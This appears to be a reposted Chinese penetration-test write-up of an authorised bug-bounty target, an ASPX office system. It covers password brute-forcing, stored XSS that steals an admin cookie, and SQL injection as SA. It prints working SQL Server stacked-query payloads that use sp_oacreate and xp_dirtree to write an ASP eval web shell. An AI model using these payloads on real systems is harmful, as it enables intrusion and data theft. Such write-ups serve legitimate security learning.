shell脚本教学(记录又一次实战GetShell)
shell脚本教学(记录又一次实战GetShell)
2024-11-22 10:40:22  作者:个圈套  网址:https://m.xinb2b.cn/life/efm160661.html

严正声明

截至发稿前,已将漏洞提交厂商并验证其已完成修复。本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天网安实验室及原作者无关,本文为合天网安实验室原创,如需转载,请注明出处!

前言

本文为记录实战过程中遇到的问题及思考,旨在思路分享及自我总结。文中涉及目标站点为SRC授权站点,为防止漏打码已对实际链接进行了部分删减,如去除了链接目录名等。整个测试过程涉及未授权访问、暴力破解、存储型XSS、SQL注入,到最后拿shell,过程略微曲折。

信息收集

打开目标站点,为系统登录界面。安装VNC远程协助链接到内网地址,经测试登录无验证码及失败次数锁定,可尝试暴力破解,此处先做信息收集。



目标站点:http://1.2.3.4/login.aspx脚本:aspx,通过登录页面可知;服务器:IIS7.5,通过404、403报错页面可得;数据库:可能为SQL Server,常见组合;

安全防护:未知,对IP进行端口扫描会封一段时间,但测试and 1=1不拦,无WAF或未开启严格的防护策略;

通过查看返回包,发现Server为nginx/1.17.2,判断应该存在反向代理。


暴力破解

通过对现有信息的分析,优先选择暴力破解,系统首页登录为密码md5前端加密后传输,此处爆破需选择burp的HASH-MD5后进行爆破。系统登录失败返回信息都为“登录失败xxx”,无法确认是否存在用户。




查看页面源码发现存在http://1.2.3.4/client/此页面未对密码进行md5加密,即首页:http://1.2.3.4/ 密码加密后传输Client:http://1.2.3.4/client/ 密码明文传输



此处用http://1.2.3.4/client/ 进行爆破,不需要进行MD5加密可提高效率,但使用name500及自定义字典,包括常见测试账号,及3位数字,4位数字,5位数字等组成5000多个用户名,爆破密码123456、888888、111111,结果一个都没爆破到。

当时的思路是先确定用户名,例如工号等,再去爆破其中存在弱口令的账号,并未想着直接爆破admin,因为那时觉得后台可能不在这里登录,现在想想也可以直接盲爆admin用户。

所以那时先收集用户名,使用Google语法,Site:xxx 工号,但并没有收获。针对只有登录界面的系统,只有掌握了用户名的规律,才能提高爆破的机率,此处很有可能是工号。用户名收集无果,便打开了目录扫描,看看有无敏感信息。

未授权访问

通过对站点进行目录扫描,存在以下目录及文件。


main.aspx访问弹登陆超时,跳转登陆界面,禁用js返回页面如下:


逐一进行访问:css.aspx访问弹出登陆超时,跳转登陆界面,禁用js访问空白;reg.aspx访问为软件注册页面;


查看源码,发现存在main_d.aspx如下:


禁用js访问main_d.aspx返回以下页面:


继续查看源码,发现以下地址通过对站点进行目录扫描,存在以下目录及文件。


禁用js访问http://1.2.3.4/MyWork/Richeng/RichengmyList_show.aspx?id=12点击修改,此处已测试id不存在SQL注入。



该页面存在大量附件,其中有体检附件登记表,点击下载链接如下:


点击下载跳转登陆界面


此处感觉是有任意文件下载,但可能需要登录,后续爆破出账户后可测试。http://1.2.3.4/file_down.aspx?number=file/liaotian/201922xx.xls

需下载文件,尝试构造http://1.2.3.4/file/liaotian/201922xx.xls



如上获取到该单位的员工工号,使用excel生成工号列表进行暴力破解。

登录系统

上述已获取工号组合,生成01111-05555进行爆破,使用密码123456、111111、888888、123qwe、qwe123、123123、123321。当使用密码123321时,成功爆破出一个弱口令用户。


使用该账号登录系统


系统功能模块较多,测试前面的文件下载http://1.2.3.4/file_down.aspx?number=file/liaotian/201922xx.xls


尝试下载web.confighttp://1.2.3.4/file_down.aspx?number=web.config


测试不存在任意文件下载,修改文件后是直接Location到文件,从而下载,后续对系统的功能点逐个进行测试。

文件上传

后台功能主要存在以下4个上传点。上传点1-印章上传:


上传点2-邮件附件:


上传点3-头像上传


上传点4:KindEditor 4.1.10 编辑器,貌似无解。上传点1,文件上传后的路径为:/seal/2021815238.png此目录未限制禁止脚本执行,但无法上传脚本文件,尝试绕过均失败。


上传点2,文件上传后的路径为:/file/emailfile/2021081523.png

此目录限制了脚本执行,即/file目录下不能执行脚本文件。

此上传点可上传aspx等文件,但上传后后缀为.unknow

后续通过注入点发现上传后缀写在数据库中,可以通过update语句增加后缀,但并无跨目录的方法,即使上传了aspx脚本文件,也无法执行。

上传文件后截图如下:


后续查看数据库,允许上传的文件后缀如下:


上传点3,任意文件上传,上传后路径为/SystemManage/User/file/ 下,测试目录限制脚本执行,无法跨目录。


存储型XSS

上面针对后台上传功能测试后无法上传getshell,便考虑是否能找到高权限账号,管理员账号可能有修改上传文件格式的权限。

此时测试邮件存在存储型XSS,发送邮件可以打用户cookie。

发送邮件给自己,收件箱打开时:


可以给管理员发送带XSS的邮件,当管理员打开邮件时,即可以获取管理员的cookie,此处配合server酱,可实现获取cookie后微信提醒通知,同样发送邮件给自己测试。

编写邮件,插入XSS平台payload。


收件箱点开后


微信收到Server酱通知



登录XSS平台查看,成功获取用户cookie信息


此处构造好XSS后,给管理员发送了标题为【问题建议】的邮件,增加管理员打开的概率,即打开邮件可获取管理员的cookie。


同时在邮件选择收件人处,发现组织架构处,可列举所有用户的工号、科室、姓名信息。


故可以收集用户工号,此处发现管理员即为admin,在等待xss的同时,也构造字典对admin进行爆破。


然后竟然成功爆破出了admin的密码,看了下密码在“全国弱口令TOP1000”中没有,如果一开始就爆破admin,可能也爆不出来,个人习惯是爆TOP1000,当初也确定不了管理员就是admin。

此处也说明有一个强字典是多么的重要。


使用admin登录系统后,只多了以下两个功能模块,很失望并没有可以修改上传设置的功能。


测试发现登录管理员也并没啥用,还是无法getshell,既然上传无门,那就寻找注入点,如果是sa的注入点则getshell的机率大很多。

SQL注入

于是又重新回到后台各个功能点进行测试,经过一番测试终于发现了一个注入点,链接如下:测试1=1页面正常


测试1=2页面异常


爆数据库版本信息


如上确认存在SQL注入,使用sqlmap进行利用,当前用户为SA。


测试使用—os-shell命令失败,可能是有安全设备拦截。


此时也对数据库的大致表进行查看,发现了管理后台某个点的文件上传格式可在数据库设置后缀,但无法跨目录,故即使能上传脚本也无法getshell。

Getshell

经手工测试注入点支持堆叠注入,此处尝试使用sp_oacreate写马,SQL如下:declare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'c:\shell.asp',1;EXEC sp_oamethod @f,'WriteLine',null,'<%eval request("cmd")%>'

但需知道网站根目录,此处可以使用xp_dirtree进行目录遍历,SQL如下:create table dirs(subdirectory varchar(255),depth int, filee int);insert dirs exec xp_dirtree 'c:\',1,1

建立表后,先执行以下查询,此处为查询c盘目录下的文件夹及文件:http://1.2.3.4/WorkFlow/AddWorkFlow_add_Next.aspx?tmp=0.8307731177113578&add=&UpNodeNum=11,&FlowNumber=20189139012187';insert dirs exec xp_dirtree 'c:\',1,1;--&FormId=86&Number=202181414


页面返回正常,则语句执行成功,再去sqlmap查询dirs表下的内容,即为c盘的目录内容:


利用上述方式成功找到网站根目录为d:\OA\ 下。执行SQL语句写入文件shell.aspdeclare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'d:\OA\shell.asp',1;EXEC sp_oamethod @f,'WriteLine',null,'<%eval request("cmd")%>'

打开链接:http://1.2.3.4/shell.asp 空白,中国菜刀连接成功。


上传冰蝎,后续可以进行socks代理,从而进入内网。


通过systeminfo收集系统信息,可用于后续提权。


以上成功获得目标站点shell。

总结

渗透测试很多时候需要的细心和耐心再加上一点运气,当我们在后台无法getshell时,可以尝试去找后台的SQL注入,高权限的注入点可以直接写shell。

又或者当我们有一个SQL注入点却没法写shell时,可以尝试读管理员账号密码,登录后台测试是否有文件上传漏洞,从而进行拿shell。关注不同的漏洞危害,并进行组合利用,往往可以达到出其不意的效果。

至此全篇完,感谢阅读,希望您能从中有所收获。

  • 临沂最近被盗电动车(370余辆被盗电动车寻找失主)
  • 2024-11-22370余辆被盗电动车寻找失主秦皇岛市公安局关于已收缴被盗电动车寻找失主统一登记的公告针对我市盗窃电动车犯罪高发的情况,秦皇岛市公安局于2021年11月16日,专门成立由市局刑警支队牵头,海港分局、山海关分局、开发区分局、港航公安。
  • 办公室瘦腿的最快方法(办公室瘦腿的最快方法介绍)
  • 2024-11-22办公室瘦腿的最快方法介绍坐在椅子上,伸直双腿让脚与地面保持一定的距离,把脚尖伸直,保持这个姿势5秒钟脚尖伸直,脚面向上呈90度角,让脚后跟和小腿肚的筋伸展开,保持5秒钟用脚踝的力量旋转双脚,同时可以拉紧小腿肚的肌肉在上楼梯时。
  • 最火的十首动漫歌曲(11首经典动漫歌曲)
  • 2024-11-2211首经典动漫歌曲人们为什么喜欢听歌,因为一首好的歌曲,无论是伴随着画面还是在你闭目养神的时候,都可以通过眼睛,通过耳朵走进你的心当然无论是动画片还是动画电影他们往往也会因为片中的某一首主题曲或是插曲让作品加分不少,下。
  • 对曹文轩的评价简短话语草房子(曹文轩草房子当你优秀了)
  • 2024-11-22曹文轩草房子当你优秀了初读曹文轩的小说《草房子》,就被“秃鹤”的形象牢牢吸引,这是一个拥有光滑均匀如打蜡般的光头少年,这是一个因光头被同学捉弄、老师歧视的自卑少年,这是一个努力想要融入集体、争取公平的偏执少年,他为了和其他。
  • 带有动物和植物的诗句飞花令 动物类飞花令集句诗32首
  • 2024-11-22带有动物和植物的诗句飞花令 动物类飞花令集句诗32首动物类飞花令集句诗32首编者:钟大新这里提供按飞花令格律集句而成的七言诗与五言诗各16首,共为32首所用的16个指定字(即飞花令的令字)依次为:龙凤鱼雁,牛马猪羊,鹰犬鸡鸭,虫鸟蜂蝶每句诗后的括号内是。
  • 同款奶瓶网上价格都不同呢(零元购购买的两款宝宝奶瓶)
  • 2024-11-22零元购购买的两款宝宝奶瓶第一款是小不点儿婴儿硅胶奶瓶!这款奶瓶是食品级硅胶的瓶身,特别软,捏着挺舒服,防滑抗摔另外有把手带吸管,使用好方便!宽口径的冲奶粉会比较方便!奶嘴也很柔软,可以360度选择舒适哺喂位置,而且0元购好物。
  • 释小龙全部电影打斗片(释小龙逃学神探)
  • 2024-11-22释小龙逃学神探释小龙自导自演的《逃学神探》邀请了童年搭档郝邵文,本身是一个不错的卖点,并且在片子里面的武打设计也是比较热血,然而,剧本跟细节处理,却让人对这部片的观感降低了许多一、在动作戏上,《逃学神探》可谓是拳拳。
  • 江淮哪年有梅雨(为什么每年六月中旬到七月中旬)
  • 2024-11-22为什么每年六月中旬到七月中旬气候由气温、降水和光照等要素组成,降水是一种大气中的水汽凝结后以液态水或固态水降落到地面的现象根据降水的形成原因,通常可以分为四类,分别是对流雨、气旋雨、锋面雨和地形雨等类型不同的降水类型,其实就是通。
  • 学校强大后盾(学校是我的坚实后盾)
  • 2024-11-22学校是我的坚实后盾图为英国杜伦大学图书馆内景来英国前,我满怀期待,想着要尝特色美食、看名胜古迹、尽情体验异国的风土人情如今,留学生活已经过半在这里,我的确通过旅行收获了很多新鲜、有趣的体验,但平日的校园生活给我留下的印。
  • iphone11 打开sim卡槽(14系列开始取消SIM卡槽)
  • 2024-11-2214系列开始取消SIM卡槽果粉之家,专业苹果手机技术研究十年!您身边的苹果专家~上周六,小编(果粉之家)给大家推送《iPhone或将取消SIM卡槽~》的文章中有写道根据巴西网站巴西网站BlogdoiPhone爆料,至少在一些国。